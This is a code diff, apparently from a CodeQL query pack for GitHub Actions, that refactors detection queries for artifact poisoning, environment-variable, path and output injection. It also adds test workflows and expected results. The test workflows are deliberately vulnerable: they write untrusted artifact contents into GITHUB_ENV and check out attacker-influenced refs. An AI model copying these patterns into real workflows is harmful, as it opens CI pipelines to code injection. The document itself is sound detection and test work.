Bash::envReachingRunExpr(run.getScript(), var, argument) and exists(run.getInScopeEnvVarExpr(var)) ) } @@ -40,15 +40,15 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { ArgumentInjectionFromEnvVarSink() { exists(Run run, string var | envToArgInjSink(var, run, command) and - run.getScriptScalar() = this.asExpr() and + run.getScript() = this.asExpr() and exists(run.getInScopeEnvVarExpr(var)) ) or exists( Run run, string cmd, string argument, string regexp, int argument_group, int command_group | - run.getACommand() = cmd and - run.getScriptScalar() = this.asExpr() and + run.getScript().getACommand() = cmd and + run.getScript() = this.asExpr() and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = cmd.regexpCapture(regexp, argument_group) and command = cmd.regexpCapture(regexp, command_group) and @@ -75,8 +75,8 @@ class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink { int command_group | run = source.getEnclosingRun() and - this.asExpr() = run.getScriptScalar() and - cmd = run.getACommand() and + this.asExpr() = run.getScript() and + cmd = run.getScript().getACommand() and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = cmd.regexpCapture(regexp, argument_group) and command = cmd.regexpCapture(regexp, command_group) @@ -106,8 +106,8 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { exists( Run run, string argument, string cmd, string regexp, int command_group, int argument_group | - run.getScriptScalar() = source.asExpr() and - run.getACommand() = cmd and + run.getScript() = source.asExpr() and + run.getScript().getACommand() = cmd and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = cmd.regexpCapture(regexp, argument_group) and argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") @@ -119,7 +119,7 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and + succ.asExpr() = run.getScript() and envToArgInjSink(var, run, _) ) } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 31a9edd03b30..d06b125ca322 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -155,15 +155,21 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use } override string getPath() { - if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + if + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) + .getScript() .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else - if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) + if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } @@ -172,31 +178,37 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { GHRunArtifactDownloadStep() { // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - this.getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and - this.getACommand().matches("%github.event.workflow_run.id%") and + this.getScript().getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and + this.getScript().getACommand().matches("%github.event.workflow_run.id%") and ( - this.getACommand().regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) + this.getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getScript().getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(this.getACommand() + normalizePath(trimQuotes(this.getScript() + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) + .getScript() .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) or - this.getACommand().regexpMatch(unzipRegexp()) + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getScript().getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } @@ -213,24 +225,30 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { // gh api $url > "$name.zip" // unzip -d "$name" "$name.zip" // done - this.getACommand().matches("%github.event.workflow_run.artifacts_url%") and + this.getScript().getACommand().matches("%github.event.workflow_run.artifacts_url%") and ( - this.getACommand().regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) + this.getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getScript().getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(this.getACommand() + normalizePath(trimQuotes(this.getScript() + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) + .getScript() .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else result = "GITHUB_WORKSPACE/" @@ -246,7 +264,7 @@ class ArtifactPoisoningSink extends DataFlow::Node { // excluding artifacts downloaded to /tmp not download.getPath().regexpMatch("^/tmp.*") and ( - poisonable.(Run).getScriptScalar() = this.asExpr() and + poisonable.(Run).getScript() = this.asExpr() and ( // Check if the poisonable step is a local script execution step // and the path of the command or script matches the path of the downloaded artifact @@ -280,7 +298,7 @@ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { pred instanceof ArtifactSource and pred.asExpr().(Step).getAFollowingStep() = step and ( - succ.asExpr() = step.(Run).getScriptScalar() or + succ.asExpr() = step.(Run).getScript() or succ.asExpr() = step.(UsesStep) ) ) @@ -288,8 +306,8 @@ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof ArtifactSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll index ca72fe00d161..fac498f72dab 100644 --- a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -31,8 +31,8 @@ private module CodeInjectionConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof FileSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 86de44c3b5ca..86c7d989522b 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -283,8 +283,8 @@ class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run { BashCommentVsHeadDateCheck() { // eg: if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then exists(string cmd1, string cmd2 | - cmd1 = this.getACommand() and - cmd2 = this.getACommand() and + cmd1 = this.getScript().getACommand() and + cmd2 = this.getScript().getACommand() and not cmd1 = cmd2 and cmd1.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") and cmd2.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 1f53c9384369..859f625e068d 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -25,15 +25,15 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { step instanceof UntrustedArtifactDownloadStep or step instanceof PRHeadCheckoutStep ) and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( exists(string cmd | - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_PATH", _) and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getACmdReachingGitHubPathWrite(cmd) and + run.getScript().getAFileReadCommand() = cmd ) or - Bash::fileToGitHubPath(run, _) + run.getScript().fileToGitHubPath(_) ) ) } @@ -49,9 +49,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { EnvPathInjectionFromCommandSink() { exists(CommandSource source | - this.asExpr() = source.getEnclosingRun().getScriptScalar() and - Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_PATH", - _) + this.asExpr() = source.getEnclosingRun().getScript() and + source.getEnclosingRun().getScript().getACmdReachingGitHubPathWrite(source.getCommand()) ) } } @@ -67,9 +66,9 @@ class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, string var_name | - Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_PATH", _) and + run.getScript().getAnEnvReachingGitHubPathWrite(var_name) and exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + run.getScript() = this.asExpr() ) } } @@ -90,8 +89,12 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and - Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + succ.asExpr() = run.getScript() and + ( + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) or + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) or + run.getScript().getAnEnvReachingGitHubPathWrite(var) + ) ) or exists(Uses step | @@ -104,8 +107,8 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof FileSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index dd6b8342185f..214e97fed6ba 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -28,15 +28,15 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step instanceof UntrustedArtifactDownloadStep or step instanceof PRHeadCheckoutStep ) and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( exists(string cmd | - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", _) and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getACmdReachingGitHubEnvWrite(cmd, _) and + run.getScript().getAFileReadCommand() = cmd ) or - Bash::fileToGitHubEnv(run, _) + run.getScript().fileToGitHubEnv(_) ) ) } @@ -52,9 +52,8 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { EnvVarInjectionFromCommandSink() { exists(CommandSource source | - this.asExpr() = source.getEnclosingRun().getScriptScalar() and - Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_ENV", - _) + this.asExpr() = source.getEnclosingRun().getScript() and + source.getEnclosingRun().getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), _) ) } } @@ -71,8 +70,8 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, string var_name | exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() and - Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_ENV", _) + run.getScript() = this.asExpr() and + run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, _) ) } } @@ -109,8 +108,12 @@ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and - Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + succ.asExpr() = run.getScript() and + ( + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) + ) ) or exists(Uses step | @@ -123,8 +126,8 @@ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof FileSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 4f9eeef75793..e959c7d60ca5 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -19,7 +19,7 @@ abstract class OutputClobberingSink extends DataFlow::Node { } */ class OutputClobberingFromFileReadSink extends OutputClobberingSink { OutputClobberingFromFileReadSink() { - exists(Run run, Step step | + exists(Run run, Step step, string field1, string field2 | ( step instanceof UntrustedArtifactDownloadStep or @@ -31,7 +31,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { exists(Uses uses | step = uses and uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") ) or step instanceof GitMutableRefCheckout @@ -43,14 +44,28 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { step instanceof GhSHACheckout ) and step.getAFollowingStep() = run and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and + // A write to GITHUB_OUTPUT that is not attacker-controlled + exists(string str | + // The output of a command that is not a file read command + run.getScript().getACmdReachingGitHubOutputWrite(str, field1) and + not str = run.getScript().getAFileReadCommand() + or + // A hard-coded string + run.getScript().getAWriteToGitHubOutput(field1, str) and + str.regexpMatch("[\"'0-9a-zA-Z_\\-]+") + ) and + // A write to GITHUB_OUTPUT that is attacker-controlled ( + // echo "sha=$(> $GITHUB_OUTPUT exists(string cmd | - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", _) and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getACmdReachingGitHubOutputWrite(cmd, field2) and + run.getScript().getAFileReadCommand() = cmd ) or - Bash::fileToGitHubOutput(run, _) + // cat test-results/.vars >> $GITHUB_OUTPUT + run.getScript().fileToGitHubOutput(_) and + field2 = "UNKNOWN" ) ) } @@ -66,16 +81,24 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { */ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { OutputClobberingFromEnvVarSink() { - exists(Run run, string var, string field | - Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and - // there is a different output variable in the same script - // TODO: key2/value2 should be declared before key/value - exists(string field2 | - run.getAWriteToGitHubOutput(field2, _) and - not field2 = field + exists(Run run, string field1, string field2 | + // A write to GITHUB_OUTPUT that is attacker-controlled + exists(string var | + run.getScript().getAnEnvReachingGitHubOutputWrite(var, field1) and + exists(run.getInScopeEnvVarExpr(var)) and + run.getScript() = this.asExpr() + ) and + // A write to GITHUB_OUTPUT that is not attacker-controlled + exists(string str | + // The output of a command that is not a file read command + run.getScript().getACmdReachingGitHubOutputWrite(str, field2) and + not str = run.getScript().getAFileReadCommand() + or + // A hard-coded string + run.getScript().getAWriteToGitHubOutput(field2, str) and + str.regexpMatch("[\"'0-9a-zA-Z_\\-]+") ) and - exists(run.getInScopeEnvVarExpr(var)) and - run.getScriptScalar() = this.asExpr() + not field2 = field1 ) } } @@ -97,13 +120,18 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { * echo $BODY */ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { + string clobbering_var; + string clobbered_value; + WorkflowCommandClobberingFromEnvVarSink() { - exists(Run run, string clobbering_line, string var_name | - Bash::singleLineWorkflowCmd(run.getACommand(), "set-output", _, _) and - run.getACommand() = clobbering_line and - clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and - exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + exists(Run run, string workflow_cmd_stmt, string clobbering_stmt | + run.getScript() = this.asExpr() and + run.getScript().getAStmt() = clobbering_stmt and + clobbering_stmt.regexpMatch("echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + clobbering_var + ".*") and + exists(run.getInScopeEnvVarExpr(clobbering_var)) and + run.getScript().getAStmt() = workflow_cmd_stmt and + clobbered_value = + trimQuotes(workflow_cmd_stmt.regexpCapture(".*::set-output\\s+name=.*::(.*)", 1)) ) } } @@ -133,30 +161,35 @@ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { * echo "::set-output name=OUTPUT::SAFE" */ class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { + string clobbering_cmd; + WorkflowCommandClobberingFromFileReadSink() { - exists(Run run, string clobbering_line | - run.getScriptScalar() = this.asExpr() and - Bash::singleLineWorkflowCmd(run.getACommand(), "set-output", _, _) and - run.getACommand() = clobbering_line and + exists(Run run, string clobbering_stmt | + run.getScript() = this.asExpr() and + run.getScript().getAStmt() = clobbering_stmt and ( - // A file is read and its content is assigned to an env var that gets printed to stdout + // A file's content is assigned to an env var that gets printed to stdout // - run: | // foo=$(> $GITHUB_OUTPUT echo "OUTPUT_2=$(> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml new file mode 100644 index 000000000000..4241647d3e11 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh + shell: bash diff --git a/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml new file mode 100644 index 000000000000..0c2059521020 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip -d /tmp/artifacts + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh /tmp/artifacts + shell: bash diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml new file mode 100644 index 000000000000..71f590fbc9c7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml @@ -0,0 +1,20 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml new file mode 100644 index 000000000000..e4845a6f2f16 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml @@ -0,0 +1,26 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + cat foo >> "$GITHUB_ENV" + echo "EOF" >> "${GITHUB_ENV}" + + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml new file mode 100644 index 000000000000..67209267b5c5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml new file mode 100644 index 000000000000..af9f01b572f1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml new file mode 100644 index 000000000000..e35bc73c3bda --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact-2 + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index aff785242f9b..220eaf336637 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -1,4 +1,9 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | @@ -25,6 +30,16 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | 